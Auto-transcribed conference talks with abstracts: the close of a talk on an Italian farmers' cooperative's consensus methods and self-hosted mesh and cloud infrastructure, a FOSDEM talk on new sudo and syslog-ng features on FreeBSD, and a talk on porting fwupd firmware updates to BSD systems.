threat of eviction. And we support a lot of this place. And are really, really important for our life. So I told you where. And I want to also tell you how, not how, only how after. When? The time. The time, it's an important stuff. The time for capitalism is thinking in hours and money. And it's fast. But this is shaped on an egocentric idea. But this is not the only way to think the time. For farmers, it's really easier. Think that time is cyclical. Not egocentric, not human-centered way. And so they are habits to plan the stuff and to take seasonal agreement or seasonal planning. And so the first stuff to rethink our life and our community is take our time, our time to grow relationship and our time to think how to do the stuff. And our time when we buy something, our time to think where come from the stuff that we buy and the stuff that we eat. In which, in how are developed and where come from. Where from, from what community and from what territories. Okay. This is a gift that you will find in the slide. If you go to check after this talk, you can see also a video in Creative Commons for sure. But now I have not the time to show our action in a video. I want to explain a bit the infrastructure. The infrastructure is based on the human agreement. And the group of Campiaperti started with five people in an occupied space, a public space. And they started with a small market. After they grow it, now there are more than 150 farmers and with thousands of people that come at the market and are co-producers of the products. And so we manage ourselves by assemblies. And we do the stuff with consensus method. So the topic are food autonomy, be independent with the food, safeguard the territories, so practice agroecology. And we have a shared warranty. So the group of farmers not accept the centralized warranty about organic food by the state. But they practice a shared warranty. Means that everyone of the producer at the market take care of the product also of the others and take care of the relationship. But this also means that if you break the trust one with the other, you go out from the community. And this looks like difficult to decide, but it's not so difficult. Because when you are local and you know the products that you grow and how are organic, it's easy to decide this stuff. It looks like that for us to explain some technical people is like if you not trust the certification authority, but you are based on a web of trust. And so we include also in our relationship, in our work, the sense of the limit and the mutualism. So we plan to not grow too much, but grow only locally. And we divided the assembly. There are assembly for every market that are eight every month. There are assembly globally altogether, every two months. And assembly every two months locally for a valet. Are based on a formal consensus method. This means that we train us to stay in the consensus area. We know that the agreement are based in a balance between a relationship and knowledge. We come from different knowledge because we are specialized in different stuff. And we have to grow together our relationship. So we try to stay in this area of consensus knowing that we are different knowledge, but I trust. We don't want to stay in anonymity. We don't want to stay always agree altogether because there are a lot of risk in that area. In this area, you grow the diversity. In that area, you are doing echo chambers and you can do easily mistake in the anonymity place. In the other, you find low trust and different knowledge. So you are in this sense normally. And you have low relationship, so low trust, but a full agreement of what you want for the future. And the only stuff you can do is take a technical agreement together. So write a really specific low. But we don't lose. We want agreement and a guideline. The other stuff are done by trust. One with the other. So we are told you that we use a formal consensus method. Means that in this distributed meeting, we have shared agreements. We start with a base ground. That is that every assembly is reported. So at the beginning of every assembly, we choose a reporter or more than one. Because sometimes there are global assembly that start at the morning and finish in the evening. And so we have a time keeper for the speaker. And we decide to put in our agreement the right to listen and to be listened. And no meta conversation over the topic. Only everyone talk, speak for herself. Okay. We need to communicate. And when we started to think about communication, we speak with another community. That know better the stuff about communication than us. And we found and we know because we shared the same political idea. With a meeting. A meeting is a community in Italy that is anti-fascist, anti-racist and anti-sexist. And was born in the 90s. Also that community. And every year they meet in a different space, occupy the space in Italy. They are for the freedom in the communication. And with a view, a critical view about technologies. So we ask and we discovered a lot of self-managed server. And the first tool that we implemented in the 2004 was our website. And we started with a lot of many lists. The first tool was mailing lists. And after to communicate outside in the group, we started with this website hosted by Autistici Inventati, that is one of the older self-managed server in Italy, near us. Based with a strong view about anonymity and privacy oriented for the user. The communication are really, really important in groups that live in the countryside. You live in different farms, one from the other. And so happened that to use the mailing list, people need connectivity. So what happened? If you base your connectivity on commercial companies in the UR in countryside, you discover that you are too far from the city and we don't earn too much enough to bring to your community. And so we started to explore how to resolve this problem. And we discovered that exists a community that thought to this stuff. And that exists a Pico peer agreement. And in Italy, we meet a NINUX community that shared us and teach us how to set mesh. Network. And so I show you a bit of photograph. Our infrastructure is small and grow really slowly. And it's based on our hardware. There are 15 people that want to stay connected with the other. And understood that broadcasting connection is nice. It's really lighter, use 5 gigahertz point to point antenna to do point to point connection. And so the cost to stay, to learn and to do and maintain that network is an effort that they can do. And we found also for people more technician that help. It's like help to install Linux. But here we install open world T. And after the people know how to maintain and take care of their in freedom, their PC. And in this case, antenna. We use also proprietary hardware that we change the firmware and we use the TPLink ubiquity but we are switching to an open hardware project that is a library. And as software, we use LibreMesh. LibreMesh.org that is a project that is a bundle of configuration open over open VRT. And that use a different protocol like bubble D and batman ADV. But yeah, the topic of them is make easier the stuff for the user and they do. So we have a blog antenna.noblogs.org where we take the documentation of this stuff. We think a lot about technology. To think why we are adopt technology. And so we started to deploy a feminist view about technologies. Means that we think that every technologies is an effort. When someone told you that this technology is smart, sometimes it's not considering the entire cycle of life of that technology. And so looking a lot in the technologies that everyone at this moment is doing advertisement about technologies, hey, use this is easy. We think stop, stop is better way and think what we are doing. So we think that it's important not to do the things alone because you became the point of failure of your community. To be resistant, you need to do the stuff with more people, not start if you are alone. And mix proficient people with newbie. Contemplate the possibility of making mistake and build a testing environment before putting the stuff in production. Document everything to explain the choice that you took and give the time to yourself and to the other to study and not to be too much specialized. Specialized brings people to easily to go to burnout. It's better if you trust yourself in more than one topic and share knowledge with the other, not to go too much in one topic because you lost the entire view and why you are doing something. You are not paid for this stuff for community. It's a need for community and a richness for everyone of your community in our view, in our way that we do the stuff. So we start from our needs. We started to speak about our digital data in 2016. This is a meeting of Genuino clandestino, the bigger network of self-organized farmers in Italy. There are a lot of different communities that grow vegetable and do direct sell in a shared public space. We started to speak about our digital data and we decided that we don't want to put in Google, Amazon, Facebook, Microsoft, Apple, space. We are anti-gaffam because we are against a big distribution of the food and also big distribution of the data. We think that in this moment it's really important to take care of our intimacies and our data. So we decided to put in a server and to run our self-deservices. And we spend one year to find a virtual private server, someone that also our digital place that shared with us our policy. And we found in France in Toulouse the data net that is inside of a bigger network that is federated the France data network. And are really important for us because they do a good work because there are for net neutrality for freedom of access to the internet. And with a budget based on donation of the community. We spent a lot of time to find inside our community of farmers, C-Satmane and we found and we started to use NextCloud as a free software to host our data. And we decided to start, we started in March of this year and we decided to start to use only for administrative work, only for 10 people of the group. And after decide if this tool is okay for our needs or not. If it's not, we will see and we are just in time to go back and not use. But at the moment the stuff are running good. And we are stored in this cloud the cards about our farmers. Because we make everyone to enter in a Campia Perti need to be visited by another farmer. And that for to know the how they grow the table and how they do organic stuff. And so we write the dossier of our self and it's why the website was not more enough. We need a private place to store this stuff. Also to decentralize the task that we have to do to distribute the task. And so after this one year of testing, we are planning how to grow. Okay, if all the stuff are going good, we decide how to grow. And so again, we decide to not do this stuff alone. We look around in a community near to us. And we decide again to adopt something that is yet to be used by a community that is anti-fascist, anti-racist, anti-sexist that is autistic invent. They changed the infrastructure this year. And they moved in a containerized container infrastructure to have divided the configuration, the specific configuration, the configuration that you can share with other and the software. All these three stuff are managed by a minimalistic orchestrator container that is called the FLUAT. And we find this solution interesting also because we studied a bit the other possibility of a solution. And we saw that in this moment there are huge software, also open source, that can resolve this problem. But developed and used by huge open source company that not really fit our needs. So we are interested in this software because it gives static service allocation. Some of these features look like non-feature for the needs of the companies. But for us, because we have a community, we have different needs. So how it works quickly, because we are at the CCC, I have to show you something technical. So we have a specific and generic configuration that we are using with Git. We use Ansible to version our configuration. And the software, so the generic part is built by the continuous integration that we have on Autistic Inventory that is built in a Docker registry and build the Docker image. And so FLUAT deployed running our Ansible playbook, deployed the different Docker image on the different machine. So why it's good for us? Because we can version all the stuff. So we can also do mistakes but go back. And we can deploy on a virtual machine where we can do testing and on the real production on the real machine. These I think. Why we think to adopt? Because we don't want to stay on a virtual machine, we would like to move on bare metal. We trust the group. This orchestrator is only 1000 lines of Python code and it's written like Ansible plug-in. And we can use double factor authentication, universal to factor authentication that is good for us because you have the stuff that your security could be based on a hardware token. So you have a security in something of local that you have to keep. And some integrated monitoring like Prometheus and Grafana. And this feature is that the services go down when something fails. And this is important for us. We are not a company that have to stay 24 hours up. We are a community that want to know if something goes wrong with your machine and if someone put physically the hands on your machine. And yeah, this is now is the time of the question. Slow please, the question because I don't speak really well English you see now, but also I don't understand really well. And this is the long list of tanks and all the community that I speak about. There is also eclectic carnival that is a feminist community that push a lot to me to arrive here to explain this stuff to you. And thanks. Thank you very much for the great talk. It was very, very interesting. We still have 10 minutes for questions and answers. If you have questions, just move to the three microphones in the room. And then we are going to have you ask your question. So we start with microphone number two. Very slow in English please. Thank you very much for the talk. I have a question. The customers, do they pay in advance for a year or do they pay at the market? Okay, in Bologna, in Campia Perti, the experience is a direct sell in the market. So the co-producer, the consumer, pay at the moment. But we know that this is not the perfect model and there are other experiments in the city in which Campia Perti and this group of farmers is involved. And so there is also Arvaya, that is another group that the consumer pay in advance and have a place and also work in fields and take boxes every week. And there is also another project that is Camilla and is based on, you are associated and you have to work three hours every month in a market. And there is this market open for all the association, all the people associated to this. So it is a city that is experimented, but for Campia Perti you not pay in advance in other projects. Is it okay if I ask something else? If it's, well, I would first take microphone number three, but if you just stay there, I feel like there would be still time for another question. So microphone number three please. Yes, I have a question about consensus. You mentioned that some level of disagreement is not only acceptable, but maybe good because if everyone agrees, then there is no discussion, development and less trust. But what level of disagreement is acceptable? Have you tried different models? Like how you achieve these consensus? Yes, we think that disagreement is important to not hide the problems. So we put attention to not say at the end of a conversation, we all agree, but for example, if someone have more doubt. And we have a formal way of consensus. So to be sure that we all agree, we do an orientation, we call it. And that means that you can divide the group in a free position. Active consensus, consensus with doubts, but that you think that trust is enough, so you are agreed, but you will be not active to do the stuff. And active consensus, that means that the decision that are you taking is against the principle. And if you put yourself in that position, you have to explain to all the others. And you have to do again an orientation. But if you are more than 20% of the people that stay in active consensus, you have to re-discuss all. So became a block. Great, thanks for the explanation. That was very interesting. Microphone number two again. Thank you for your talk. I wanted to ask whether you have any mechanism to help people that want to become farmers, especially to acquire new land? Exist a project and now it's not more active. We are sad because it's not more active. And because this project started from people that had this need. And after they found land and said, okay, we have not more the time. And we have not find again who put the time in that project. And so there is not a real process in which we help people to became farmers. But for example, the mailing list is open. One that participate to the market can join the mailing list and also the assembly, the meeting. And so a lot of time that people ask for space in countryside and so find information. And the other stuff that really change, make the change is that a lot of people come in Campiaparti asking to do transformation, to transform only the food. And this fact is not acceptable in Campiaparti. The people can not only transform the food. We do practice for being independent from capitalism for our food. And so you can't ask only to transform. And so we ask these people to start a project, to grow vegetables and became a farmer. And so all started an active collaboration with a group of farmers that yet exist. And so in this way started more people to live in countryside. Thank you very much. Next up we have a question from the Internet. You seem to have gone really far in doing a lot of things yourself. Do you still rely on a lot of mainstream technologies or did you reimplement everything yourself? Is everything self-made or do you still rely on some mainstream technologies? Is there something that you use that is mainstream capitalist that everybody else uses too? You mentioned that you don't use Google or Facebook or something. Apart from that is there something mainstream that you still use that you rely on? We are not monopolistic. We have the basic communication in independent infrastructure. But some of them are not direct running autistic. We are based on self-managed servers. So community that shared with us political topic. But in that way we are not running the service. We are not running the service. To communicate we use the website and the mailing list. So we have our independent communication. But we not avoid people of us that use also commercial instrument or commercial social network. The stuff is only that we don't trust too much. That way of communication will be really useful when we need. Another question from microphone number two please. Hi, thank you for your presentation. In your presentation you mentioned dossier written by farmers about other farmers and farmers visiting other farmers. I wanted to ask, what kind of information do they collect and how are they used? What is the purpose of the dossier and what information do they collect? It is the protocol of shared warranty. And so a person that want to enter in a campia party from the website can ask to be visited and start to fill a form and fill these cards. And after these cards go to the assembly of that valley. The valley where these farmers come from. And decide when to do the visit. So this visit is reported to the next assembly and who did the visit say what this person wrote in the card is true or not true. And so also here you have the weight of trust. Of how much trust the words of a person that asked to enter. And we store this card, this dossier and we print. And we print and we put physically on the desk when people do the market. Because it's really important that people that come to buy the stuff know where, know and if they want to go also to visit the producer. And also because I told you that some of that organic stuff are organic but not with the certification by the state. And also a lot of that stuff that are transformed are inside of the campaign Genuino clandestino. That means that are transformed and made but out of the low. And so you need that people are well informed who buy the stuff. Sorry, sorry, I'm very sorry but we don't have time for back up questions. Also I'm very sorry I would have loved to have the person who asked the first question also have like asked the last question but we ran out of time. But I'm sure that you can still catch Andrea after the talk and ask whatever questions were not answered. So first of all, thanks for all of your very interesting and clever questions. And also thank you very much Andrea for the great presentation. Please give another big warm round of applause for Andrea. Thank you very much. Thank you.
We will analyze the approach to tecnology (decisional method, mesh network and cloud) of a farming community near Bologna: Campi Aperti. Speaking about: human organization, connectivity, managing of a server, resources and incidents handler, femminism, maintaining and growing in a non-gerarchical organization. Technologies involved: humans, antennas, orchestrator of containers. Summarize the experience of this last 15 years of a group of farmers, the strong political impact about take care of the near territory, decide what grow and what eat and share this decisions with the consumers in the city, settled a method that is called "shared warranty", garanzia partecipata, for the organic vegetables, refuse the big distribution of the food and how this principles, with also some femminist ideas, can bring us to think in a different way our tech organizations and our tools. In the last 3 years the group Campiaperti and Genuino Clandestino, the italian network of self-managed farmers, started to make questions and solution about tecnologies and started slowly to mantain their services.
10.5446/48041 (DOI)
Hi, I'm Peter Arzhamit, open source evangelist at 1&Entity. Today I will talk about what is new in sudo and syslogangy and provide you with a BSD specific view. I started to use free BSD in 1994. Today I will spend most of my time with sudo and syslogangy. So I will introduce you to what is new with this 2 software and also show you how to install it on free BSD either from binary packages with pkj or combining it yourself from ORDS. Finally I will also show you how to use syslogangy in BSD. So let's start with sudo. What is sudo? I asked this question from thousands of people over the past few years and the typical answer depended on the experience of the person and went into three main categories. For most people sudo is a tool to complicate life. Why do you sudo if you can log in as root or use the su command to change the root? But even seasoned administrators told me that well sudo is just a prefix for administrative commands and only a few people told me that they know some of the advanced features of sudo. So what is sudo? sudo allows a seasoned administrator to delegate authority by giving certain users the ability to run some commands as root or another user by providing an audit trail of the commands and their arguments. So as you can see it's a lot more than just a prefix. If we can believe to xkcd it can even get you a sandwich. Just make sure that when you make a request for a sandwich then you use the sudo prefix. Back to more series topics. sudo comes with a huge set of useful defaults but if some of these do not fit your use case you can change these defaults using the default statement in your configuration. Here are a couple of examples like changing what path is considered secure by sudo, which is environment variables to keep from the user's settings and disabling insults for the user's. You can also make defaults user or host specific. For example the last line of the screen shows how to enable insults for members of the wheel tube. So what are insults? Insults are fun but not always politically correct error messages when someone mistypes a password. It's kind of sysadmin humor. As you can see it's nothing harmful but still some people find it offensive so it's disabled now by default. Another lesser known feature of sudo is digest verification. You can store the digest of applications in this sudoers file and this way sudo always compares the digest with the application before running it. The downside is that it's quite difficult to maintain this database in your sudoers file. On the other hand this way you can prevent modified binaries from running and it provides you with an additional layer of protection if you don't trust your users. Another feature is session recording. Sudo can record everything what is happening on your terminal which is especially useful when you have users which need shell access instead of just some specific commands. The recordings can be played back just like a movie. They are quite difficult to modify as they are not clear text. On the other hand these files are saved locally therefore they are easy to delete with unlimited access. The good news is that starting with sudo 1.9 which was released last year session recordings can be collected centrally which means that anything what a user does is streamed in real time to another location so they cannot modify or delete the recordings. Once you have more than just a handful of machines you want to manage your configurations centrally. Most configuration management systems support sudo but sudo itself has support for centrals. You can store your configuration in eldop which has the advantage that settings propagate in real time and they cannot be modified by users locally. On the other hand there are quite a few limitations as for example you cannot use aliases and if your network is down you might not be able to run sudo. Another feature which was added to sudo 1.9 is python support. Previously you can extend sudo through C based plugins but now you can write your own extensions to sudo using python using the very same APIs. The advantage of python is that there is no need for a dedicated development environment or compiling your code and you can even distribute your python code using a config management system. One of the most interesting APIs to sudo is the iolox API. Using this API you can access input and output from user sessions. And for example you can use python to break connections if a given text appears on screen so it's a kind of data lake prevention or you can analyze the command line what users are trying to run and break the session if someone tries to use error mines fr on the command line. Here is a short python example it's fully functional but of course it doesn't cover any corner cases so it's just to show that it how it works. In this case anytime my secret appears on the screen the session is broken. On the following screen I will show you how it works. I created a file called mysecret in a directory and before it could be shown on screen the session is terminated. Here is the screenshot the user starts sudo with minus s so it starts as shell changes to the root directory lists the directory and can see that oh there is that directory called do not enter it must be something very interesting let's check it out the user changes to this directory and types the ls command but before my secret could appear on screen the session is terminated. Now let's change the syslogangy. First of all what is logging? Logging is a recording of events happening on a computer such as an ssh login message and most people are only aware of this that you can see what happened on your system in text files in the var log directory. So what is syslogangy? It's an enhanced logging domain with a strong focus on portability and high performance in central collection. Originally it was developed in C but now you can extend it in python or java as well. And it has many more features than just simple saving log messages to text files. Let's see the four major roles of syslogangy. The first role is collecting data. We can collect system and application logs together providing quite useful contextual data for either side. It can collect log messages from a wide variety of platform specific sources like devlog, jorma, sun streams and so on. As a central log collector it can collect log messages over the network using the legacy or the new syslog protocol over UDP, TCP and encrypted connections. And it can also collect logs or any kind of text data from applications through files, sockets, pipes and even application output. If none of these fits your needs you can extend syslogangy using python and for example add HTTP server to syslogangy to collect log messages like the HTTP event collector in sprunk. The next role is log processing. You can classify normalizing structure logs with built-in parsers. For example the CSV parser can parse any kind of columnar data like Apache access logs, or can parse freeform log messages like the SSH login message. And there are parsers for JSON format messages, key value pairs or even for XML. And these parsers can also be combined together so we have also parsers for cscool log messages and for many more. You can also rewrite log messages using syslogangy and you don't have to think about falsifying log messages here but for example an animation is required by different compliance regulations. For example finding and overwriting credit card numbers in log messages. You can also enrich log messages at additional fields based on the message content or use the gip parser to add geolocation to IP addresses. Or you can reformat log messages using templates like the elastic search destination needs JSON format field messages, some scene system needs the ISO date format and so on. And if you want you can extend, you can parse your log messages using Python, you can implement any of the above features in Python as well or you can enrich your log messages from databases and also do filtering from Python which brings us to our next topic, filtering data. It has two main uses, discarding source plus log messages like you don't want to store debug level messages as storage is expensive and these messages are rarely used. Another use for filtering is message routing like making sure that all of your authentication related events reach your scene system. There are many possibilities for filtering, it can be based on message content, different message parameters, you can use comparisons, white cards, many different filtering functions and best of all you can combine any of these with boolean operators to make really quite complex filters within syslogang. Finally, you have to store your log messages somewhere, most people are only aware that they can store log messages to text files either locally or at the central syslogang server. But there are many more possibilities, you can store log messages to databases, to different scene systems, to big data like Hadoop, Erasticsearch, MongoDB, to message queuing like Kafka or AMQP, so there are many possibilities and if none of these fits your needs you can use Python or Java to extend syslogang with a new destination. Here you can see a heat map of IP addresses as found by the GIP parser in syslogang. This is real data, it's from my home router sitting in a quiet suburb of Budapest but as you can see the network itself is nothing quiet, everyone from around the world tries to connect but fortunately kicked out by my firewall. Here I combine sudo and syslogang and send alerts from sudo to Slack in real time. Sudo logs are parsed automatically by syslogang so all I had to do is add a filter to filter on my username and whenever I do something through sudo syslogang sends a message in real time to Slack. Of course alerting on myself is not much use but you can do the same on your hosts with multiple engineers using sudo. So here comes a tricky question, what is common between the BMW i3 and the Kindle ebook reader? The answer is syslogang. Both of them are running syslogang. And most people are not aware of it that hundreds of millions of devices run syslogang. What else syslogang and sudo used? Sudo is installed on almost all bsd linux, unix and macOS systems so many devices. And syslogang is available on most linux distributions and bsd variants. It's running by default on most bsd based appliances like Freenas or OpenSense. It's also on Synology and QNAP network attached storage systems and on tourism near firewalls. I wouldn't be surprised to learn if I learned that it's also running somewhere in space. So let's see how you can install this software on FreeBSD. sudo is available in the FreeBSD ports under the security group. This port is kept pretty much up to date, it follows the 1.9 line of sudo. If you install the binary package using pkj, it only has the very basic functionality. But don't worry, most people don't use anymore. But if you need any of the advanced functionality I mentioned earlier, then you need to compile sudo yourself from ports. For example, if you want to enable inserts, you need to compile sudo yourself. But also if you want held up support, Python or Kerberos support within sudo. Cisco GenG is also in FreeBSD ports in the sysutils group. I'm a commentator for this port, so it's also kept up to date. If you use the pre-built binary package, Cisco GenG provides only basic functionalities. But define basic, previously we tried to keep the extra dependencies low, so we only enabled features we didn't need any external dependencies. But over the years, some extra features were enabled, like DRS, so encryption support is enabled by default for years. Last year, two years ago, we enabled JSON support by default, and last year, HTTP support was enabled by default as well. This means that without recompiling syslog.ng, you can store log messages to Elasticsearch port to many different cloud-based login-assess service providers, like SumoLogic or Logly. For example. But you still need to compile syslog.ng from ports yourself if you want to enable support for language pytings like Python or Java. If you want to store your log messages to databases like different SQL databases or MongoDB, if you need message queuing like AMQP, Kafka, and to support many other technologies like SMTP, SNMP, GIP, and more. Finally I want to show you how to run syslog.ng in Bastille. But first of all, what is Bastille? Bastille is an open-source system for automating deployment and management of containerized applications on 3DSD. It doesn't have any hard dependencies on any other applications. The only exception is JIT if you want to use the templates. And you want us to use a template for syslog.ng as well. On the next slides I will show you how to install Bastille and get to your first syslog.ng jail. First you need to install Bastille from ports. It's also in the sysutils group. Then set up Bastille, configure your firewall. And then create a new jail. Install syslog.ng using template. And finally also configure your firewall. On my slides I will show you only a very basic setup, but there are many more possibilities like you can use CFS, VNET, and other advanced 3DSD technologies. So, the latest version of Bastille you can install from ports, freshly updated ports as it was just released last week. Just change to the directory, make install clean and enable it. The simplest setup which works everywhere is to use a cloned interface and use private IP addresses for your jails and redirect external ports to your internal network using the PF firewall. So, the next slide shows you PFConf. Using this you can protect your host and forward connections to your jails without editing your firewall configuration anymore. So Bastille can maintain your firewall settings. And finally I will show you how to get started with Bastille commands. As a first step you need to bootstrap a release of 3DSD you want to use. I used 12.2 and I also bootstraped the CISL GenG template. Next I created a jail using this release on a private IP address. Then applied the template to this jail and as a final step I redirected an external port to the internal network. Now you are ready to send log messages from your other hosts to CISL GenG running in Bastille. And now it's time for questions. Thank you for your attention. Okay, we're going to switch to live now. You hear me? Yes, I can hear you. Okay, excellent. So thanks Peter for this great presentation. Now it's time for questions. I saw you start answering some of them on the chat. Maybe if we have other questions. Someone was asking if using the slack destination is documented somewhere. Of course it's part of the official documentation but I also have a blog about it and I sent the URL to the chat. You can find this blog and many others about how to use CISL GenG on CISL GenG.com under the community many point and not just slack but many other use cases are described including the steps how to install CISL GenG on FreeBSD and other operating systems. So please forward if you have someone who is probably taking questions. No. So I think that's probably all. Thank you very much for your presentation. Thank you for welcoming me here. And if you still have any questions, I will stay here for a while and can answer anything. Okay. And I hope you will see you next year with another great presentation and probably answering the questions. Thank you very much. And I think this is the end for the BSD Devroom. Thank you all for being here. All the presentations and videos will be available on the FOSDEM website. I think probably today, maybe tomorrow. And I think that's all. I hope I will see you next year probably in Brussels so we can share some waffles and some cup of beers together and enjoy the rest of the day. Thank you very much. Goodbye. Thank you. Thank you. Thank you.
Most people consider sudo and syslog-ng as old, small and stable utilities. Yes, they are from the ‘90s, but both are constantly evolving, gaining many interesting new features along the way. Peter, who is an evangelist for these two applications, shows you some of the most interesting new developments in both projects. By default, only basic functionality is enabled in FreeBSD ports, so we will also take a look at some of the extra features you can enable if you compile the packages yourself. On the syslog-ng side most people know that it can save incoming log messages to text files, and few are aware of the complete set of features this tool has. Syslog-ng has four major roles: collecting log messages, processing, filtering and storing them. There are many supported log sources and you can write your own in Python. Or another example: it can find credit card numbers in logs and remove them to comply with PCI-DSS. And syslog-ng can store logs not just to text files, but to databases, big data destinations, like Hadoop, or to Splunk or Elasticsearch as well. Sudo is mostly known as a prefix for administrative commands. Did you know that you can also record sessions, extend sudo with Python scripts and even analyze what is happening on the screen? Learn which of the above mentioned features are supported in FreeBSD ports (hint: all of them), which are enabled by default, and which features require you to recompile sudo or syslog-ng.
10.5446/48081 (DOI)
Hello, my name is Norbert Kaminski and today I will tell you about porting FWAPD to the BSD distributions. That means keeping your hardware safe with up-to-date firmware. Okay, let's start with agenda. At the beginning of the presentation I will tell you about project Genesis and BSD community concerns. Then I will go to overall information about FWAPD and I will show you tool architecture. Then I will present you firmware and metadata update verification process. In the middle of my presentation I will show you our previous ports for Kube's operating system. And then I will go to our current status of work and main problems that we face now. At the end of my presentation I would love to hear your opinion about our project. At the beginning of my presentation let's type who am I, comment. My name is Norbert Kaminski, I'm working as an Embedded System Engineer at 3MDep Embedded System Consulting. I'm actively contributing to open source projects mainly to your layers like MetaPC and Rhymes or MetaTrangeBoot. Our last open source project were FWAPD wrapper for Kube's operating system. In my scope of interest are firmware upgrade tools, virtualization and Embedded Linux. If you want to catch me you can do it by my socials that are linked here. Why we want to port FWAPD to BSD distributions? Our clients were asking us if there is easy way to upgrade firmware from BSD operating systems level. The second reason is that community were asking if there is possibility to port FWAPD to BSD distributions. So we connected that fax and we've created the project FWAPD port for BSD distributions that is founded by an old net foundation. During the discussion on BSD subreddit there appear some concerns about FWAPD project. This presentation I will try to clarify with doubts. Main objection were why I should trust a firmware provider. Do I need a demon running all the time to check the updates? I don't need this FWAPD project because I can send an email to manufacturer and then update my firmware by USB stick. Let's go to some overall information about FWAPD project. Security of this system is determined not only by the software entrance but also by the firmware. The vulnerabilities of the firmware can migrate to this system and for this particular reason we should keep our firmware up to date. Non-windows users face three main problems during the firmware update process. The first problem is that windows specific tools do not work with other systems. That problem is that users sometimes have no idea what hardware it runs and if this hardware is supported by this firmware update. The third trouble that clarifies one of these doubts I showed in the previous slide is that it is hard sometimes to find a proper update at the internet. It's really painful and FWAPD can query your hardware check if there is available update and download and update this securely. So our mission is to provide the FWAPD to BSD distributions to make the firmware update process easier. Let's look at FWAPD architecture. It could be split into three parts. First part is the internet layer where it is placed. LVFS that could be extended to Linux vendor firmware service. It holds in the database firmware updates and firmware metadata. Metadata contains information about possible updates that could be downloaded by the session layer. Metadata is delivered by the content delivery network and firmware is delivered by the directly TV session layer. In this session layer there is FWAPD manager. FWAPD manager holds all process of the firmware update. It asks LVFS for metadata about new updates and if there are updates available it asks user if he wants to upgrade his devices and if he wants he downloads the firmware and put it to the cache. Cache could be used to test the device to download and upgrade the firmware without downloading the firmware all the time from the LVFS. That could be used also if you want to upgrade a few of the same devices. So FWAPD manager also contacts with the system session where it leaves FWAPD demon. FWAPD demon connects with the devices and provides information about the devices to the FWAPD manager and if there is update possible it provides new firmware to the devices. Let's talk a little more about Linux vendor firmware service. The LVFS is web service that is used by manufacturer to upload the firmware. The LVFS provides also information about the updates in metadata form. The firmware is packed into Kabynut files that contains metadata information about specific update. It also contains JCAD files that are used to validate the firmware process. The one who we trust in the firmware process is manufacturer because manufacturer is signing the firmware not LVFS service. So that clarifies that objection about trusting the firmware provider. Now I will go to firmware and metadata verification process. Since version 1.4.0 FWAPD uses libJCAD to verify the metadata and firmware updates. For that version FWAPD required during the verification process PKS7 or GPG signature. LibJCAD allows reading and writing JZIP compressed JSON catalog files that contains GPG and PKS7 signatures. And it also contains checksums of the files that are contained in the Kabynut files. So during the verification process libJCAD is looking for the firmware. Then it checks if GPG and PKS7 signature matches and also checks checksums. The FWAPD manager uses this information to validate that files that are provided from the LVFS are good to go and ready to upgrade. Now I will go to our previous part for Kube's operating system. We have implemented a wrapper for FWAPD which allows upgrading firmware in virtualized system. The Kube's is one of the most secure operating system based on Linux kernel. It leverages Zen hypervisor to create and manage Kube's which are isolated compartments. Here you can see architecture of our wrapper. It is based on three Kube's. First Kube is update VM which is connecting with LVFS and it's downloading the firmware for the device. And it's DOM0 the administration VM which allows to communicate with the device. And the last Kube is CCUSB which allows to communicate with devices connected to the USB. The whole operation of the update is handled by Kube's FWAPD manager which calls the update VM to download the firmware. Then it is cached like in the FWAPD architecture. It's also validated on every step of the firmware process, updating firmware process. Then it is transferred from one virtual machine to the other. The other once again validates the same update file and then it is distributed to the FWAPD demo on VM or once again transferred to the CCUSB VM. Then the demos are installing the updates of the firmware. We would like to provide the FWAPD functionalities for four distributions. FreeBSD, DragonflyBSD, NetBSD and OpenBSD. First of all we would like to implement firmware updates for USB devices. After that we will implement the UFI capsule updates for motherboards and UFI based devices. Currently we are trying to compile FWAPD under the FreeBSD distribution. Most of the FWAPD dependencies is already available in the FreeBSD package manager. But we are facing some problems. LeapGUSB is a hard requirement of the FWAPD. Port of this library was started by Ting Weilang and this library is based on Leap USB 1.0. FreeBSD distribution provides its own implementation of this library but this implementation lacks in function that LeapGUSB is using. This function is specified in the FreeBSD bugzilla in the Strat. During the method configuration we are looking for libraries where we find library methods of the compiler object. This method doesn't work correctly so we have to change it to hard dependency to make the configuration of the project work correctly. FreeBSD also uses DevD instead of UDAF. We have to turn off all plugins that are using UDAF or in the later stage we can just replace UDAF with DevD. Also there is no system D in the BSD distribution so we have to turn on this option. Another problem is that FreeBSD kernel does not support ESRT. ESRT is EFI system resource table which is based for UFI capsule update. The ESRT provides a read-only catalogue of system components which the system accepts to be upgraded via UFI capsule update feature. The module allows user-land to evaluate what firmware updates can be applied to the hardware and devices. Now when you are trying to compile the FWUPD we are failing due to Linux header dependencies so we have to fix that as well. If you want to contact us here are the links. We are open to discuss and cooperate. Now it's time for questions. We would love to hear your opinion about the port of FWUPD for BSD distributions. Thank you. Thank you for your attention and waiting for questions. Thank you for your great presentation. So now it's time for questions. So please if you have questions you can write it on the BSD room chat. If you have any doubts about this project you can also type them in the BSD chat and I will try to answer them. Maybe I will tell you some more about the progress of this project. Now we can compile the FWUPD project in free BSD distribution with turn off all the plugins that are connected with Linux and we created some if defines in the FWUPD project. Currently we are able to get some information and development tool that is called FWUPD tool. And we are able to refresh metadata that means there are some information about the available updates like I said in my presentation. So now we are trying to fix the problems that are connected with the configuration localization of configuration files in BSD distribution because that differs from the Linux one. I will really appreciate your opinion about this project because I heard some comments in Reddit and I will really appreciate if you would say something about that. So if you don't have questions regarding this project maybe... Oh there is one. There is a question. Okay go ahead. Okay is there any privilege separation work in FWUPD? Probably it's too early for something like that but it would be possible to run this under CapsU come or something similar and also picking for... And also thanks for picking that. Yeah, there is a privilege separation in FWUPD. You need the... So the privilege is to update the firmware of the device and you have to accept this firmware update. So it won't be without your knowledge. This won't be updated without your knowledge. And I can... Okay but would it be possible to run under CapsU come or something similar? I'm not sure what you mean under the term of CapsU come so maybe you can clarify or I will just go go that. Just to clarify, yes CapsU come is the security framework under 3DSD. So you can provide or you can drop privileges from an application. So as an example when an application needs to access a file, once you access the file and have the file descriptor you can drop the privileges to access the file system. So you guarantee nobody can use your applications to perform and desire actions. Okay, I understand. We have to look at that for sure and it's really important to make these vulnerable operations like updating the firmware in secure way. So it will be really helpful to use this framework. I will make some notes on my left side. Thank you for your great talk. Thank you. I appreciate that you want to watch it. It's very important to have firmware updated on every system. Yeah, I agree. I think this project is very important. I will look forward. I have camera here and I cannot read all the questions. Wait a second. Okay, I think this is a very important project and I will look forward its production ready version. Yeah, I will appreciate that. I think we will send some status blog posts on our site, free and depth site where we will inform you how is project going and where we are in current time. I think there is probably one question. No, it's just 